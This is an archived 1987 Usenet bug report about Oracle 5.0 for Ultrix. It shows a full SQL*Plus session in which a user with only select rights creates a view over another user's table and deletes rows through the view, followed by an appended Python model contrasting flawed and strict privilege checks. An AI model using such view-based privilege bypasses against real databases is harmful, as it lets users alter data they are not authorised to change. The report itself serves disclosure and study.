Relay-Version: version B 2.10 5/3/83; site utzoo.UUCP
Path: utzoo!mnetor!uunet!ccicpg!felix!zemon
From: zemon@felix.UUCP (Art Zemon)
Newsgroups: comp.databases
Subject: bug in Oracle 5.0 for Ultrix
Message-ID: <14974@felix.UUCP>
Date: Wed, 2-Dec-87 16:21:40 EST
Article-I.D.: felix.14974
Posted: Wed Dec  2 16:21:40 1987
Date-Received: Mon, 7-Dec-87 04:07:35 EST
Sender: daemon@felix.UUCP
Reply-To: zemon@felix.UUCP (Art Zemon)
Organization: FileNet Corp., Costa Mesa, CA
Lines: 103
Keywords: views violate security


You can gain free access to a table which you only have
select privileges for by creating a view.  Try this:

    Script started on Wed Dec  2 13:13:24 1987
    fritz {21} sqlplus

    SQL*Plus: Version 1.0.11 - Production on Wed Dec  2 13:13:29 1987

    Copyright (c) 1986, Oracle Corporation, California, USA.  All rights reserved.

    Enter user-name: ops$zemon
    Enter password: 
    Connected to: ORACLE V5.0.20 .4 - Production


    SQL> create table t (n number);

    Table created.

    SQL> insert into t values (1);

    1 record created.

    SQL> insert into t values (2);

    1 record created.

    SQL> select * from t;

	N
    -----
	1
	2

    SQL> grant select on t to public;

    Grant succeeded.

    SQL> connect ops$otheruser
    Enter password: Connected.

    SQL> select * from ops$zemon.t;

	N
    -----
	1
	2

    SQL> delete from ops$zemon.t where n = 2;
    delete from ops$zemon.t where n = 2
			  *
    ERROR at line 1: ORA-1031:  insufficient privileges

    SQL> create view v as select * from ops$zemon.t;

    View created.

    SQL> select * from v;

	N
    -----
	1
	2

    SQL> delete from v where n = 2;

    1 record deleted.

    SQL> select * from v;

	N
    -----
	1

    SQL> select * from ops$zemon.t;

	N
    -----
	1

    SQL> connect ops$zemon
    Enter password: Connected.

    SQL> select * from t;

	N
    -----
	1

    SQL> exit
    Disconnected from ORACLE

    fritz {22} exit
    script done on Wed Dec  2 13:16:47 1987

You can also insert rows through view v and update existing
data.  The bug is supposed to be fixed in 5.1.
--
	-- Art Zemon
	   By Computer:	    ...!hplabs!felix!zemon
	   By Air:	    Archer N33565
	   By Golly:	    moderator of comp.unix.ultrix
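
An added example, not part of the original post and not Oracle code: a small Python model of the privilege check the session above exercises. The post does not say how Oracle 5.0 decides; `allowed_flawed` is an assumed rule that reproduces the observed results, `allowed_strict` is the behaviour the session expected, and every class and function name here is hypothetical.

```python
# Constructed model, not Oracle code: names and check logic are assumptions.
class Catalog:
    def __init__(self):
        self.owner = {}       # object name -> owning user
        self.base = {}        # view name -> object it selects from
        self.grants = set()   # (grantee, privilege, object)

    def create_table(self, user, name):
        self.owner[name] = user

    def grant(self, privilege, obj, grantee):
        self.grants.add((grantee, privilege, obj))

    def holds(self, user, privilege, obj):
        """Direct privilege: ownership, a personal grant, or a grant to public."""
        return (self.owner[obj] == user
                or (user, privilege, obj) in self.grants
                or ("public", privilege, obj) in self.grants)

    def create_view(self, user, name, source):
        if not self.holds(user, "select", source):
            raise PermissionError("ORA-1031: insufficient privileges")
        self.owner[name], self.base[name] = user, source

    def allowed_flawed(self, user, privilege, obj):
        # Looks only at the object named in the statement; a view's owner always passes.
        return self.holds(user, privilege, obj)

    def allowed_strict(self, user, privilege, obj):
        # Also walk view -> base object, requiring each view's owner to hold
        # the same privilege on what that view reads from.
        if not self.holds(user, privilege, obj):
            return False
        while obj in self.base:
            view_owner, obj = self.owner[obj], self.base[obj]
            if not self.holds(view_owner, privilege, obj):
                return False
        return True

def replay(check_name):
    """Replay the session's grants, then ask what ops$otheruser may do."""
    c = Catalog()
    c.create_table("ops$zemon", "t")
    c.grant("select", "t", "public")
    c.create_view("ops$otheruser", "v", "t")
    check = getattr(c, check_name)
    return {(p, o): check("ops$otheruser", p, o)
            for p in ("select", "insert", "update", "delete") for o in ("t", "v")}

if __name__ == "__main__":
    for name in ("allowed_flawed", "allowed_strict"):
        print(name, replay(name))
```

Under the strict rule, select through v still works because the grant to public covers it, while insert, update and delete through v are refused just as they are on t.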